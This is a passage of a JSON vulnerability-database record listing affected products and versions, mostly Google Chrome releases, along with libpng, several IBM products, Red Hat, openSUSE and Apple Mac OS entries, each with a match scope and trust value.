"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "10.0.605.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "19.0.1051.0"
},
{
"_id": null,
"model": "vios",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "2.2.0.11"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "13.0.782.51"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "28.0.1500.58"
},
{
"_id": null,
"model": "cognos insight",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "10.2.1"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "24.0.1312.49"
},
{
"_id": null,
"model": "enterprise linux desktop",
"scope": "eq",
"trust": 0.3,
"vendor": "redhat",
"version": "6"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "23.0.1271.32"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "17.0.963.55"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "11.0.663.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "24.0.1275.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "18.0.1025.133"
},
{
"_id": null,
"model": "opensuse",
"scope": "eq",
"trust": 0.3,
"vendor": "s u s e",
"version": "13.2"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "22.0.1229.96"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "30.0.1599.79"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "19.0.1046.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "12.0.742.122"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "34.0.1847.9"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "17.0.934.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "17.0.963.14"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "25.0.1364.27"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "32.0.1700.11"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "17.0.928.2"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.0.31"
},
{
"_id": null,
"model": "websphere real time sr6",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "3"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "35.0.1916.9"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "31.0.1650.14"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "19.0.1080.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "17.0.963.67"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "17.0.951.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "28.0.1500.22"
},
{
"_id": null,
"model": "powerkvm sp3",
"scope": "ne",
"trust": 0.3,
"vendor": "ibm",
"version": "2.1.1"
},
{
"_id": null,
"model": "websphere real time sr4-fp2",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "3"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "37.0.2062.0"
},
{
"_id": null,
"model": "powerkvm",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "2.1"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "18.0.1025.130"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "31.0.1650.26"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "13.0.782.52"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "25.0.1364.55"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "8.0.552.332"
},
{
"_id": null,
"model": "cplex enterprise server",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "12.4"
},
{
"_id": null,
"model": "ilog optimization decision manager enterprise",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "3.5"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "30.0.1599.81"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "14.0.835.108"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "11.0.688.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "19.0.1050.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "13.0.782.11"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "17.0.960.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "14.0.838.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "13.0.782.27"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "37.0.2062.12"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "23.0.1271.18"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "12.0.742.43"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "10.0.648.12"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "12.0.718.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "17.0.963.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "16.0.890.1"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "15.0.874.5"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "23.0.1271.21"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "19.0.1057.3"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "19.0.1084.19"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "20.0.1132.20"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "41.0.2272.76"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "25.0.1364.30"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "9.0.597.25"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "25.0.1364.61"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "32.0.1676.2"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "9.0.597.100"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "17.0.963.62"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "13.0.782.41"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "25.0.1364.84"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "25.0.1364.3"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "37.0.2062.25"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "11.0.696.33"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "35.0.1916.105"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "33.0.1750.31"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "18.0.1023.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "33.0.1750.57"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "33.0.1750.46"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "18.0.1010.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "12.0.724.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "9.0.597.65"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "31.0.1650.47"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "22.0.1229.7"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "19.0.1084.51"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "21.0.1180.64"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.2.9"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "10.0.612.3"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.0.19"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "17.0.938.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "24.0.1294.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "22.0.1229.4"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "17.0.963.36"
},
{
"_id": null,
"model": "forms viewer",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "4.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "30.0.1599.16"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "13.0.775.4"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.2.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "25.0.1364.21"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "12.0.741.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "19.0.1084.27"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "9.0.597.101"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "9.0.588.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "31.0.1650.29"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "34.0.1847.59"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "33.0.1750.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "25.0.1364.75"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "19.0.1045.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "14.0.799.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "13.0.782.104"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.2.33"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "37.0.2062.16"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "19.0.1073.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "14.0.835.152"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "14.0.792.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "32.0.1667.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "22.0.1229.21"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "8.0.552.322"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "24.0.1279.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "25.0.1364.87"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "21.0.1180.35"
},
{
"_id": null,
"model": "cognos metrics manager",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "10.1.1"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "25.0.1364.97"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "32.0.1700.3"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "25.0.1364.36"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "23.0.1271.52"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "18.0.1025.44"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "15.0.874.103"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "21.0.1180.47"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "27.0.1453.112"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "10.0.634.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "15.0.874.106"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "27.0.1453.79"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "11.0.696.53"
},
{
"_id": null,
"model": "ilog optimization decision manager enterprise",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "3.4"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "27.0.1453.2"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "19.0.1029.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "34.0.1847.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "27.0.1453.7"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "29.0.1547.39"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "32.0.1700.54"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "24.0.1302.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "24.0.1312.33"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "10.0.648.118"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "23.0.1271.51"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "28.0.1500.12"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "22.0.1229.39"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "14.0.827.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "10.0.642.2"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "17.0.945.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "24.0.1312.1"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "18.0.1025.151"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "20.0.1132.46"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "22.0.1229.76"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "13.0.782.30"
},
{
"_id": null,
"model": "tivoli monitoring",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "6.2.32"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "14.0.835.107"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "12.0.742.94"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "32.0.1666.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "44.0.2403"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "35.0.1916.41"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "16.0.895.0"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "0.90"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "28.0.1500.6"
},
{
"_id": null,
"model": "vios",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "2.2.1.0"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.2.15"
},
{
"_id": null,
"model": "flex system manager",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "1.3.20"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "12.0.742.49"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "19.0.1084.29"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.4.5"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "11.0.696.44"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.5.5"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "24.0.1272.1"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.2.10"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "8.0.552.234"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "22.0.1229.33"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "35.0.1916.21"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "15.0.874.104"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "12.0.742.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "32.0.1700.103"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.0.24"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "10.0.650.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "11.0.696.19"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "10.0.648.8"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "13.0.782.47"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "16.0.912.38"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "33.0.1750.135"
},
{
"_id": null,
"model": "mac os",
"scope": "ne",
"trust": 0.3,
"vendor": "apple",
"version": "x10.11.4"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "27.0.1453.61"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.4.10"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "24.0.1301.2"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "22.0.1229.29"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "9.0.597.75"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "31.0.1650.20"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "15.0.868.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "24.0.1304.1"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "27.0.1453.4"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "24.0.1312.45"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "18.0.1017.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "32.0.1671.2"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "27.0.1453.82"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "25.0.1364.98"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "25.0.1364.15"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "12.0.742.6"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "27.0.1453.40"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "33.0.1750.92"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "12.0.742.5"
},
{
"_id": null,
"model": "cplex optimization studio",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "12.6.3"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "34.0.1847.53"
},
{
"_id": null,
"model": "vios",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "2.2.0.10"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "18.0.1025.60"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "25.0.1364.117"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "23.0.1271.57"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "30.0.1599.87"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "25.0.1364.112"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "17.0.933.1"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "9.0.597.32"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "21.0.1180.46"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "10.0.642.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "14.0.835.121"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "9.0.574.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "17.0.936.1"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "31.0.1650.37"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "28.0.1500.43"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "20.0.1132.10"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "16.0.912.27"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.0.33"
},
{
"_id": null,
"model": "vios",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "2.2.3.3"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "26.0.1410.64"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "39.0.2171.65"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "31.0.1650.42"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "11.0.696.1"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "28.0.1500.72"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "8.0.552.24"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.4.3"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "17.0.946.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "15.0.874.48"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "16.0.888.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "12.0.742.18"
},
{
"_id": null,
"model": "decision optimization center",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "3.7"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "18.0.1025.29"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "18.0.1025.5"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "24.0.1307.0"
},
{
"_id": null,
